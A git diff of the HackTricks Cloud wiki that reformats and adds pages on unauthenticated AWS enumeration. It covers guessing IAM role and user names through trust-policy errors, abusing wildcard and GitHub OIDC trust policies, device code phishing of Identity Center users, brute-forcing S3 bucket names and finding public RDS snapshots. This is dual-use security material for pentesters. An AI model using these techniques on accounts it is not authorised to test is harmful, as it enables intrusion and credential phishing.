b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md similarity index 50% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md index 04863b285..8bc9c4bf0 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md @@ -1,33 +1,19 @@ # AWS - IAM & STS Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Enumerate Roles & Usernames in an account ### ~~Assume Role Brute-Force~~ -{% hint style="danger" %} -**This technique doesn't work** anymore as if the role exists or not you always get this error: - -`An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` - -You can **test this running**: - -`aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` -{% endhint %} +> [!CAUTION] +> **This technique doesn't work** anymore as if the role exists or not you always get this error: +> +> `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` +> +> You can **test this running**: +> +> `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return: @@ -49,26 +35,24 @@ You can use this [script to enumerate potential principals](https://github.com/R Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided. -{% hint style="warning" %} -Note that in that resource you could specify a cross account role or user: - -* `arn:aws:iam::acc_id:role/role_name` -* `arn:aws:iam::acc_id:user/user_name` -{% endhint %} +> [!WARNING] +> Note that in that resource you could specify a cross account role or user: +> +> - `arn:aws:iam::acc_id:role/role_name` +> - `arn:aws:iam::acc_id:user/user_name` This is a policy example: ```json { - "Version":"2012-10-17", - "Statement":[ + "Version": "2012-10-17", + "Statement": [ { - "Effect":"Allow", - "Principal": - { - "AWS":"arn:aws:iam::216825089941:role\/Test" + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::216825089941:role/Test" }, - "Action":"sts:AssumeRole" + "Action": "sts:AssumeRole" } ] } @@ -78,7 +62,7 @@ This is a policy example: That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating) -![](<../../../.gitbook/assets/image (153).png>) +![](<../../../images/image (153).png>) #### CLI @@ -115,15 +99,15 @@ aws iam create-role --role-name Test-Role2 --assume-role-policy-document file:// An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2" ``` -You can automate this process with [https://github.com/carlospolop/aws\_tools](https://github.com/carlospolop/aws_tools) +You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) -* `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` +- `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu): -* `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -* `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -* The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration +- `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` +- `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` +- The `admin` role used in the example is a **role in your account to by impersonated** by pacu to create the policies it needs to create for the enumeration ### Privesc @@ -131,16 +115,16 @@ In the case the role was bad configured an allows anyone to assume it: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "*" + }, + "Action": "sts:AssumeRole" + } + ] } ``` @@ -153,21 +137,21 @@ This trust might give access to a role with the following **trust policy**: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" } - ] + } + } + ] } ``` @@ -182,24 +166,11 @@ Another potential misconfiguration is to **add a condition** like the following: } ``` -Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org\_name1** and **assume the role** from a Github Action. +Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action. ## References -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) -* [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) +- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +- [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md index fc17e635b..192876460 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md @@ -1,19 +1,6 @@ # AWS - Identity Center & SSO Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## AWS Device Code Phishing @@ -21,8 +8,8 @@ Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing In order to perform this attack the requisites are: -* The victim needs to use **Identity Center** -* The attacker must know the **subdomain** used by the victim `.awsapps.com/start` +- The victim needs to use **Identity Center** +- The attacker must know the **subdomain** used by the victim `.awsapps.com/start` Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account. @@ -76,7 +63,7 @@ Send the generated link to the victim using you awesome social engineering skill If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\ This is how the promp looks nowadays: -
+
4. **Get SSO access token** @@ -131,27 +118,14 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217 ### Automatic Tools -* [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) -* [https://github.com/sebastian-mora/awsssome\_phish](https://github.com/sebastian-mora/awsssome_phish) +- [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) +- [https://github.com/sebastian-mora/awsssome_phish](https://github.com/sebastian-mora/awsssome_phish) ## References -* [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) -* [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) -* [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html) -* [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) +- [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) +- [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) +- [https://mjg59.dreamwidth.org/62175.html](https://mjg59.dreamwidth.org/62175.html) +- [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md new file mode 100644 index 000000000..2bc784c6b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md @@ -0,0 +1,13 @@ +# AWS - IoT Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +mqtt://{random_id}.iot.{region}.amazonaws.com:8883 +https://{random_id}.iot.{region}.amazonaws.com:8443 +https://{random_id}.iot.{region}.amazonaws.com:443 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md new file mode 100644 index 000000000..867126bbd --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md @@ -0,0 +1,11 @@ +# AWS - Kinesis Video Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +https://{random_id}.kinesisvideo.{region}.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md new file mode 100644 index 000000000..a39d47c39 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md @@ -0,0 +1,22 @@ +# AWS - Lambda Unauthenticated Access + +{{#include ../../../banners/hacktricks-training.md}} + +## Public Function URL + +It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. + +### Public URL template + +``` +https://{random_id}.lambda-url.{region}.on.aws/ +``` + +### Get Account ID from public Lambda URL + +Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ +This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). + +You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md new file mode 100644 index 000000000..b15f112d5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md @@ -0,0 +1,13 @@ +# AWS - Media Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +https://{random_id}.mediaconvert.{region}.amazonaws.com +https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel +https://{random_id}.data.mediastore.{region}.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md new file mode 100644 index 000000000..5187644a2 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md @@ -0,0 +1,22 @@ +# AWS - MQ Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Public Port + +### **RabbitMQ** + +In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` + +### ActiveMQ + +In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. + +### Public URL template + +``` +https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ +ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md new file mode 100644 index 000000000..94ccbb070 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md @@ -0,0 +1,18 @@ +# AWS - MSK Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public Port + +It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). + +It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. + +### Public URL template + +``` +b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com +{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md new file mode 100644 index 000000000..a4ff8039b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md @@ -0,0 +1,44 @@ +# AWS - RDS Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## RDS + +For more information check: + +{{#ref}} +../aws-services/aws-relational-database-rds-enum.md +{{#endref}} + +## Public Port + +It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. + +## Public RDS Snapshots + +AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: + +```bash +# Public RDS snapshots +aws rds describe-db-snapshots --include-public + +## Search by account ID +aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]' +## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted) +## To share a RDS encrypted snapshot you need to share the KMS key also with the account + + +# From the own account you can check if there is any public snapshot with: +aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] +## Even if in the console appear as there are public snapshot it might be public +## snapshots from other accounts used by the current account +``` + +### Public URL template + +``` +mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 +postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md new file mode 100644 index 000000000..3503a91a7 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md @@ -0,0 +1,11 @@ +# AWS - Redshift Unauthenticated Enum + +{{#include ../../../banners/hacktricks-training.md}} + +### Public URL template + +``` +{user_provided}...redshift.amazonaws.com +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md similarity index 68% rename from pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md index ec6530ee8..f78886c5d 100644 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md @@ -1,19 +1,6 @@ # AWS - S3 Unauthenticated Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 Public Buckets @@ -29,33 +16,34 @@ Different methods to find when a webpage is using AWS to storage some resources: #### Enumeration & OSINT: -* Using **wappalyzer** browser plugin -* Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. -* **Check for resources** in domains like: +- Using **wappalyzer** browser plugin +- Using burp (**spidering** the web) or by manually navigating through the page all **resources** **loaded** will be save in the History. +- **Check for resources** in domains like: - ``` - http://s3.amazonaws.com/[bucket_name]/ - http://[bucket_name].s3.amazonaws.com/ - ``` -* Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` -* Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. -* The **bucket name** and the **bucket domain name** needs to be **the same.** - * **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. - * To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). + ``` + http://s3.amazonaws.com/[bucket_name]/ + http://[bucket_name].s3.amazonaws.com/ + ``` + +- Check for **CNAMES** as `resources.domain.com` might have the CNAME `bucket.s3.amazonaws.com` +- Check [https://buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/), a web with already **discovered open buckets**. +- The **bucket name** and the **bucket domain name** needs to be **the same.** + - **flaws.cloud** is in **IP** 52.92.181.107 and if you go there it redirects you to [https://aws.amazon.com/s3/](https://aws.amazon.com/s3/). Also, `dig -x 52.92.181.107` gives `s3-website-us-west-2.amazonaws.com`. + - To check it's a bucket you can also **visit** [https://flaws.cloud.s3.amazonaws.com/](https://flaws.cloud.s3.amazonaws.com/). #### Brute-Force You can find buckets by **brute-forcing name**s related to the company you are pentesting: -* [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) -* [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) -* [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) -* [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) -* [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) -* [https://github.com/tomdev/teh\_s3\_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) -* [https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3) -* [https://github.com/Eilonh/s3crets\_scanner](https://github.com/Eilonh/s3crets_scanner) -* [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) +- [https://github.com/sa7mon/S3Scanner](https://github.com/sa7mon/S3Scanner) +- [https://github.com/clario-tech/s3-inspector](https://github.com/clario-tech/s3-inspector) +- [https://github.com/jordanpotti/AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) (Contains a list with potential bucket names) +- [https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets](https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets) +- [https://github.com/smaranchand/bucky](https://github.com/smaranchand/bucky) +- [https://github.com/tomdev/teh_s3_bucketeers](https://github.com/tomdev/teh_s3_bucketeers) +- [https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3) +- [https://github.com/Eilonh/s3crets_scanner](https://github.com/Eilonh/s3crets_scanner) +- [https://github.com/belane/CloudHunter](https://github.com/belane/CloudHunter) 
# Generate a wordlist to create permutations
 curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
@@ -117,7 +105,7 @@ or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com`
 
 If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**:
 
-![](<../../../.gitbook/assets/image (106).png>)
+![](<../../../images/image (106).png>)
 
 ### Enumerating the bucket
 
@@ -125,18 +113,18 @@ To test the openness of the bucket a user can just enter the URL in their web br
 
 Open to everyone:
 
-![](<../../../.gitbook/assets/image (201).png>)
+![](<../../../images/image (201).png>)
 
 Private:
 
-![](<../../../.gitbook/assets/image (83).png>)
+![](<../../../images/image (83).png>)
 
 You can also check this with the cli:
 
 ```bash
 #Use --no-sign-request for check Everyones permissions
 #Use --profile  to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
-#--recursive if you want list recursivelyls 
+#--recursive if you want list recursivelyls
 #Opcionally you can select the region if you now it
 aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2]
 ```
@@ -209,20 +197,7 @@ s3_client.put_bucket_acl(
 
 ## References
 
-* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
-* [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
+- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
+- [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
new file mode 100644
index 000000000..b97f36c13
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md
@@ -0,0 +1,21 @@
+# AWS - SNS Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SNS
+
+For more information about SNS check:
+
+{{#ref}}
+../aws-services/aws-sns-enum.md
+{{#endref}}
+
+### Open to All
+
+When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic:
+
+

+
+So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
new file mode 100644
index 000000000..2bd20c8a4
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md
@@ -0,0 +1,23 @@
+# AWS - SQS Unauthenticated Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## SQS
+
+For more information about SQS check:
+
+{{#ref}}
+../aws-services/aws-sqs-and-sns-enum.md
+{{#endref}}
+
+### Public URL template
+
+```
+https://sqs.[region].amazonaws.com/[account-id]/{user_provided}
+```
+
+### Check Permissions
+
+It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/README.md b/src/pentesting-cloud/azure-security/README.md
similarity index 68%
rename from pentesting-cloud/azure-security/README.md
rename to src/pentesting-cloud/azure-security/README.md
